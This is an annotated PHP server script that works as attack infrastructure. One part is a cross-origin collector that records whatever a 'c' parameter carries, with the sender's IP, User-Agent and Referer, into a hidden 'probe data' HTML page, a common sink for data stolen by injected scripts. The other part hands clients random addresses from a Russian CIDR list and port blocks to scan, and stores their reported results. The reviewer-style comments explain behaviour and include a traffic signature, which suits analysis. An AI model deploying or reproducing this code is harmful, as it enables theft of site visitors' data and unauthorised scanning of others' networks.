<?php |
|
// Cross-origin policy for this endpoint: every origin is allowed, so a script
// running in a page on any site can call it from the visitor's browser.
// NOTE(review): browsers reject credentialed cross-origin requests when the
// allowed origin is the "*" wildcard, so the Allow-Credentials line should not
// make cookies usable here; confirm against the client that calls this.
$corsHeaders = [
    "Access-Control-Allow-Origin: *",
    "Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE",
    "Access-Control-Allow-Headers: Content-Type, Authorization",
    "Access-Control-Allow-Credentials: true",
];
foreach ($corsHeaders as $corsHeader) {
    header($corsHeader);
}

// CORS preflight: answer 200 with an empty body and stop, before anything is
// logged or stored.
$isPreflight = $_SERVER['REQUEST_METHOD'] === 'OPTIONS';
if ($isPreflight) {
    http_response_code(200);
    exit();
}
|
|
|
/**
 * Append one timestamped line to a log file.
 *
 * The line has the form "[Y-m-d H:i:s] message" followed by a newline. The
 * message is written as given; nothing here escapes or strips line breaks, so
 * a message containing "\n" produces extra log lines.
 *
 * If the file cannot be opened, "error: log file." is echoed into the response
 * and nothing is written.
 *
 * @param mixed  $logMessage  Text to record.
 * @param string $logFilePath File to append to; defaults to ./logfile.log.
 */
function mlog($logMessage, $logFilePath = './logfile.log') {
    $line = sprintf("[%s] %s\n", date('Y-m-d H:i:s'), $logMessage);

    $out = fopen($logFilePath, 'a');
    if (!$out) {
        echo "error: log file.";
        return;
    }

    fwrite($out, $line);
    fclose($out);
}
|
/**
 * Pick the address that will be recorded for the current request.
 *
 * Client-IP and X-Forwarded-For are request headers, so both are chosen by
 * whoever sent the request; only the REMOTE_ADDR fallback comes from the
 * connection itself. Treat the result as an unverified claim.
 *
 * Selection order:
 *  - with X-Forwarded-For present, the candidates are Client-IP (if set)
 *    followed by the forwarded entries, and the first one that does not match
 *    the private-prefix pattern wins;
 *  - with only Client-IP present, that header is returned unchecked;
 *  - otherwise $_SERVER['REMOTE_ADDR'].
 *
 * @return mixed The chosen header value, or $_SERVER['REMOTE_ADDR'].
 */
function get_real_ip(){
    $picked = false;

    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $picked = $_SERVER["HTTP_CLIENT_IP"];
    }

    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Entries are split on ", " exactly; a list without the space stays
        // one element.
        $candidates = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);

        if ($picked) {
            array_unshift($candidates, $picked);
            $picked = FALSE;
        }

        foreach ($candidates as $candidate) {
            // The pattern covers the 10., 172.16. and 192.168. prefixes only.
            // NOTE(review): eregi() was removed in PHP 7.0, so on current
            // runtimes this line is a fatal error whenever the header is set.
            if (!eregi ("^(10|172\.16|192\.168)\.", $candidate)) {
                $picked = $candidate;
                break;
            }
        }
    }

    return $picked ?: $_SERVER['REMOTE_ADDR'];
}
|
|
|
/**
 * Return the User-Agent header of the current request.
 *
 * The value is supplied by the client and is returned without validation.
 *
 * @return mixed Whatever $_SERVER['HTTP_USER_AGENT'] holds.
 */
function get_user_agent(){
    $agent = $_SERVER['HTTP_USER_AGENT'];
    return $agent;
}
|
|
|
/**
 * Return the Referer header of the current request.
 *
 * The value is supplied by the client and is returned without validation.
 *
 * @return mixed Whatever $_SERVER['HTTP_REFERER'] holds.
 */
function get_referer(){
    $referer = $_SERVER['HTTP_REFERER'];
    return $referer;
}
|
|
|
/**
 * Remove backslash escapes from a value before it is logged.
 *
 * htmlspecialchars() is used here only as a truthiness test; its output is
 * discarded, so this function does not escape anything. A value whose escaped
 * form is empty or "0" is returned untouched.
 *
 * NOTE(review): htmlspecialchars() expects a string, so the array branch below
 * looks unreachable (PHP 8 raises a TypeError before it); confirm before
 * relying on array input being handled.
 *
 * @param mixed $content Value to clean.
 * @return mixed The value with stripslashes() applied, or the input unchanged.
 */
function quotes($content){
    if (!htmlspecialchars($content)) {
        return $content;
    }

    if (!is_array($content)) {
        return stripslashes($content);
    }

    foreach (array_keys($content) as $key) {
        $content[$key] = stripslashes($content[$key]);
    }
    return $content;
}
|
|
|
// Collector: a request carrying a non-empty "c" parameter in $_REQUEST gets
// one record appended to an HTML page stored next to this script. The record
// holds the claimed client address, the time, the User-Agent and Referer
// headers, and the "c" value itself.
// Every field is passed through htmlspecialchars() at write time, so stored
// values render as text when the page is opened.
// NOTE(review): the page has a fixed name in the script directory; if that
// directory is served over HTTP it is presumably readable by anyone who knows
// the name.
if (!empty($_REQUEST["c"])){
    $sinkPage = "HujGrskagyuasd.html";

    $curtime = date("Y-m-d H:i:s");
    $ip = get_real_ip();
    $useragent = get_user_agent();
    $referer = get_referer();
    $data = $_REQUEST["c"];

    // The first record creates the page and writes its <head> once.
    if (!file_exists($sinkPage)) {
        $fp = fopen($sinkPage, "a+");
        fwrite($fp, '<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>probe data</title><style>body{font-size:13px;}</style></head>');
        fclose($fp);
    }

    $fp = fopen($sinkPage, "a+");
    $record = htmlspecialchars(quotes($ip))
        . " | " . $curtime
        . " <br />UserAgent: " . htmlspecialchars(quotes($useragent))
        . " <br />Referer: " . htmlspecialchars(quotes($referer))
        . " <br />DATA: " . htmlspecialchars(quotes($data))
        . "<br /><br />";
    fwrite($fp, $record);
    fclose($fp);
}
|
|
|
|
|
########################################################################################## |
|
|
|
/**
 * Store one posted scan report in the local SQLite database.
 *
 * Creates the `scan` table on first use, then writes one row per entry of
 * $jsonData['ports'] (array key -> port, array value -> res), all stamped with
 * the current Unix time. Values reach SQLite through bound parameters, not
 * string-built SQL.
 *
 * Notes for whoever reads the stored data:
 *  - nothing in this function validates the host, the port numbers or the
 *    result strings, so rows are unverified client claims;
 *  - with the schema created here, `id` is the only key, so INSERT OR REPLACE
 *    has no host/port conflict to replace and each report adds rows;
 *  - COMMIT is executed although no BEGIN is issued in this function;
 *  - the database is closed only when a 'ports' array was present.
 *
 * @param mixed $jsonData Decoded request body; 'host' and 'ports' are read.
 */
function db_insert($jsonData) {
    $db = new SQLite3('./jhasgdkyuasAHLhiahusd.db');
    // NOTE(review): the SQLite3 constructor throws on failure, so this branch
    // is not expected to run.
    if (!$db) {
        die("Connection failed: " . $db->lastErrorMsg());
    }

    $db->exec('CREATE TABLE IF NOT EXISTS scan (id INTEGER PRIMARY KEY, host TEXT, port INTEGER, res TEXT, time_scan DATETIME)');

    $time = time();
    $host = $jsonData['host'];
    $stmt = $db->prepare('INSERT OR REPLACE INTO scan (host, port, res, time_scan) VALUES (:host, :port, :res, :time_scan)');

    $hasPorts = $jsonData !== null && isset($jsonData['ports']) && is_array($jsonData['ports']);
    if (!$hasPorts) {
        return;
    }

    foreach ($jsonData['ports'] as $port => $res) {
        $bindings = [
            ':host'      => [$host, SQLITE3_TEXT],
            ':port'      => [$port, SQLITE3_INTEGER],
            ':res'       => [$res, SQLITE3_TEXT],
            ':time_scan' => [$time, SQLITE3_INTEGER],
        ];
        foreach ($bindings as $placeholder => $binding) {
            $stmt->bindValue($placeholder, $binding[0], $binding[1]);
        }
        $stmt->execute();
    }

    $db->exec('COMMIT');
    $db->close();
}
|
|
|
/**
 * Split an IPv4 network in CIDR notation into address and dotted netmask.
 *
 * The prefix length is cast with (int), so trailing whitespace such as the
 * newline kept by file() does not change the result.
 *
 * @param string $cidr Network written as "a.b.c.d/len".
 * @return array Two elements: the address part, then the netmask as a dotted quad.
 */
function v4CIDRtoMask($cidr) {
    $parts = explode('/', $cidr);
    $address = $parts[0];
    $prefixLength = (int)$parts[1];

    // All-ones shifted left by the number of host bits; long2ip() keeps the
    // low 32 bits.
    $maskBits = -1 << (32 - $prefixLength);

    return array($address, long2ip($maskBits));
}
|
|
|
/**
 * Return one randomly chosen address inside a network.
 *
 * The range runs from the network address plus one to the broadcast address
 * minus one; the pick is made with random_int().
 *
 * @param string $ip_address Any address inside the network, dotted quad.
 * @param string $ip_nmask   Netmask of the network, dotted quad.
 * @return string The chosen address as a dotted quad.
 */
function ipv4Breakout ($ip_address, $ip_nmask) {
    $address = ip2long($ip_address);
    $mask = ip2long($ip_nmask);

    $hostMask = ~$mask;
    $hostBits = $hostMask & $address;

    // Clearing the host bits gives the network address; setting them all
    // gives the broadcast address.
    $lowest = long2ip(($address ^ $hostBits) + 1);
    $highest = long2ip(($address | $hostMask) - 1);

    // Both bounds go through long2ip()/ip2long() so they are plain 32-bit
    // values before random_int() compares them.
    return long2ip(random_int(ip2long($lowest), ip2long($highest)));
}
|
|
|
/**
 * Return one random line of the CIDR list for a country code.
 *
 * Only 'ru' is handled: a line is drawn with rand() from the file "ru.cidr"
 * in the working directory. file() is called without flags, so the returned
 * line keeps its trailing newline. Any other code yields an empty string.
 *
 * @param string $country Country code; defaults to 'ru'.
 * @return string One line of the list, or "" for an unhandled code.
 */
function selectIp ($country = 'ru') {
    if ($country != 'ru') {
        return "";
    }

    $ranges = file("ru.cidr");
    $index = rand(0, count($ranges) - 1);
    return $ranges[$index];
}
|
/**
 * Send the requesting client one unit of scan work as JSON, then exit.
 *
 * The unit is a single address drawn at random from a random line of the 'ru'
 * CIDR list, plus one shuffled block of ports: 1-999, a 1000-port block
 * between 1000 and 64999, or 65000-65535.
 *
 * Response shape, useful when matching this traffic on the wire:
 *   {"scan":"true","host":"<dotted quad>","scan_max_time":"500",
 *    "scan_thread":"100","ports":[...]}
 *
 * The script ends silently when no CIDR line is available.
 */
function sendScanRange() {
    $cidrLine = selectIp("ru");
    if ($cidrLine == "") {
        exit();
    }

    $network = v4CIDRtoMask($cidrLine);
    $target = ipv4Breakout($network[0], $network[1]);

    // One of 66 port blocks, chosen at random.
    $block = random_int(0,65);
    switch ($block) {
        case 65:
            $portList = range(65000,65535);
            break;
        case 0:
            $portList = range(1,1000-1);
            break;
        default:
            $portList = range($block*1000, ($block+1)*1000 -1);
    }
    shuffle($portList);

    $payload = [
        'scan' => 'true',
        'host' => $target,
        'scan_max_time' => '500',
        'scan_thread' => '100',
        'ports' => $portList,
    ];

    header('Content-Type: application/json');
    echo json_encode($payload);
    exit();
}
|
// Dispatcher for JSON request bodies. Two message kinds are recognised:
//   {"data": "false"}         -> the client is handed a unit of scan work
//   {"type": "scan_port", …}  -> the client's results are stored
// Nothing visible here authenticates the caller or checks where the request
// came from, so both the work hand-out and the stored results depend entirely
// on what the client sends.
$postData = json_decode(file_get_contents('php://input'), true);

// Loose comparison, as written: values that compare equal to 'false' under
// PHP's == rules also match.
$wantsWork = isset($postData['data']) && $postData['data'] == 'false';
if ($wantsWork) {
    sendScanRange();
}

$isReport = isset($postData['type']) && $postData['type'] == 'scan_port';
if ($isReport) {
    db_insert($postData);
    http_response_code(200);
    // The reply is the JSON string "{res:ok}", not a JSON object.
    echo json_encode('{res:ok}');
}

exit();
|
?> |
|
|
|
|